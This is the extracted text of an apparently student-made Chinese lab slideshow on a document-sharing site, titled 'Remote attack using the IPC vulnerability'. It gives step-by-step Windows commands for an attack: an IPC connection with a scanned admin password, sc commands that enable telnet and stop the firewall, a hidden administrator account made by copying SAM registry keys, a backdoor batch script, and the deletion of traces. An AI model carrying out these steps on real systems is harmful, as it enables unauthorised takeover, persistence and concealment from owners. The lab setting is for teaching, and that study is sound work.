• / 23
  • 下载费用:5 金币  

利用IPC漏洞进行远程攻击.ppt

关 键 词:
利用 IPC 漏洞 进行 远程 攻击
资源描述:
,安全信息,利用IPC漏洞进行远程攻击,,组员:万鹏 游红 孙振宇,,,,,,,,,,,,,,,,,,,实验目标,,利用IPC漏洞进行远程攻击,目标:攻击机A 对被攻击机B实现完全控制 A通过软件NTScan扫描得到B的管理员帐号和密码,接着通过命令与B建立IPC连接,然后在B上开启telnet服务,上传和运行程序,进行远程注册表配置,建立一个隐藏的管理员用户,实现对B的完全控制。,,,,,,,,,,,,,,,,,,,实验工具,,利用IPC漏洞进行远程攻击,计算机(安装windows操作系统)2台扫描软件NTScan攻击软件sc.exe,,,,,,,,,,,,,,,,,,,实验步骤,,利用IPC漏洞进行远程攻击,1.配置计算机和服务器的IP地址,保证网络通畅。2.攻击机安装NTScan扫描软件,扫描被攻击机,得到了其开放的端口、操作系统类型和管理员的密码。3.入侵目标计算机4.添加隐藏用户5.保留管理后门,隐藏攻击痕迹。,,,,,,,,,,,,,,,,,,,实验步骤—步骤1,利用IPC漏洞进行远程攻击,1.配置计算机和服务器的IP地址,保证网络通畅。,,,,,,,,,,,,,,,,,,,,实验步骤—步骤2,2.扫描被攻击机 输入被攻击机的IP地址扫描,得到了计算机开放的端口、操作系统类型和管理员的密码。,,,,,,,,,,,,,,,,,,,实验步骤—步骤3,,3.入侵 被攻击机,(1)攻击机在命令窗口输入命令,建立连接。“net use \\192.168.1.254 123456 /user:administrator”,,,,,,,,,,,,,,,,,,,实验步骤—步骤3,,3.入侵 被攻击机,(2)输入sc命令扫描目标计算机的所有服务列表,并保存到“c:\search.txt”文件中。,,,,,,,,,,,,,,,,,,,实验步骤—步骤3,,3.入侵 被攻击机,(3)打开文件“c:\search.txt”,找到telnet,确认telnet的服务状态(默认为禁用状态)。,,,,,,,,,,,,,,,,,,,实验步骤—步骤3,,3.入侵 被攻击机,(4)如果知道telnet的服务名称,可以直接使用命令“sc \\IP qc tlntsvr”查看。,,,,,,,,,,,,,,,,,,,实验步骤—步骤3,,3.入侵 被攻击机,(5)输入命令“sc \\IP config tlntsvr start= auto”,将telnet服务的禁用状态设置为自动运行。,,,,,,,,,,,,,,,,,,,实验步骤—步骤3,,3.入侵 被攻击机,(6)输入命令“sc \\IP start tlntsvr”,开启telnet服务。,,,,,,,,,,,,,,,,,,,实验步骤—步骤3,,3.入侵 被攻击机,(7)输入命令“sc \\IP stop sharedaccess”,停用目标计算机的windows防火墙。 注意:如果配置了路由和远程访问,要先禁用掉。,,,,,,,,,,,,,,,,,,,实验步骤—步骤3,,3.入侵 被攻击机,(8)输入命令“sc \\IP qc romoteregistry”查询目标计算机启用了远程注册表服务,如果该服务为停用状态,则启用。,,,,,,,,,,,,,,,,,,实验步骤—步骤4,,4.添加隐藏用户,(1)输入命令“telnet IP”建立telnet连接,输入管理员的账户和密码,管理被攻击机。(2)输入命令“net user 名字 密码/add”,在被攻击机上建立账户。,,,,,,,,,,,,,,,,,,,实验步骤—步骤4,,4.添加隐藏用户,(3)在运行窗口中输入“RegEdit”命令打开“注册表编辑器”窗口,在“选择计算机”窗口中输入目标计算机的地址。,,点击确定后,输入用户名和密码,即可打开被攻击机的注册表。,,,,,,,,,,,,,,,,,,,实验步骤—步骤4,,4.添加隐藏用户,(4)打开被攻击机的注册表,在SAM权限窗口中,赋予管理员完全控制权限。(5)展开 “\SAM\SAM\Domains\Account\Users”项下后三位1F4的子项,将其内容复制到后三位3FA的子项。(6)导出被攻击机注册表的hack项和000003FA项,保存为文件“c:\hack1.reg”和“c:\hack2.reg”。(7)返回到telnet命令行,输入命令“net user hack/delete”,删除被攻击机的账户“hack”。,,,,,,,,,,,,,,,,,,,,实验步骤—步骤4,,4.添加隐藏用户,(8)将文件“hack1.reg”和“hack2.reg”复制到目标计算机,并导入,此时在攻击机上建立隐藏用户完成。,,在被攻击机中看不到用户“hack”,,,,,,,,,,,,,,,,,,,实验步骤—步骤4,,4.添加隐藏用户,(9)打开被攻击机的注册表,取消管理员的读取和完全控制权限,恢复到默认状态。(10)输入命令“net user \\对方IP delete”,删除目前和目标计算机的IPC连接。,,,,,,,,,,,,,,,,,,,,实验步骤—步骤5,,5.隐藏攻击痕迹,(1)在本地建立一个脚本文件“open23.bat”。,,(2)通过用户“hack”重新连接到远程计算机,将脚本文件复制到被攻击机的C盘下。,,,,,,,,,,,,,,,,,,,实验步骤—步骤5,,5.隐藏攻击痕迹,(3)通过telnet连接到远程计算机,在被攻击机上运行open23.bat脚本。,,(4)最后,删除目标计算机上的遗留文件open23.bat。,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,从此以后,黑客可以在目标计算机上来去自如!,,安全信息,谢谢!,,
展开阅读全文
1
  金牌文库所有资源均是用户自行上传分享,仅供网友学习交流,未经上传用户书面授权,请勿作他用。
0条评论

还可以输入200字符

暂无评论,赶快抢占沙发吧。

关于本文
本文标题:利用IPC漏洞进行远程攻击.ppt
链接地址:http://www.gold-doc.com/p-257039.html
关于我们 - 网站声明 - 网站地图 - 资源地图 - 友情链接 - 网站客服客服 - 联系我们
copyright@ 2014-2018 金牌文库网站版权所有
经营许可证编号:浙ICP备15046084号-3
收起
展开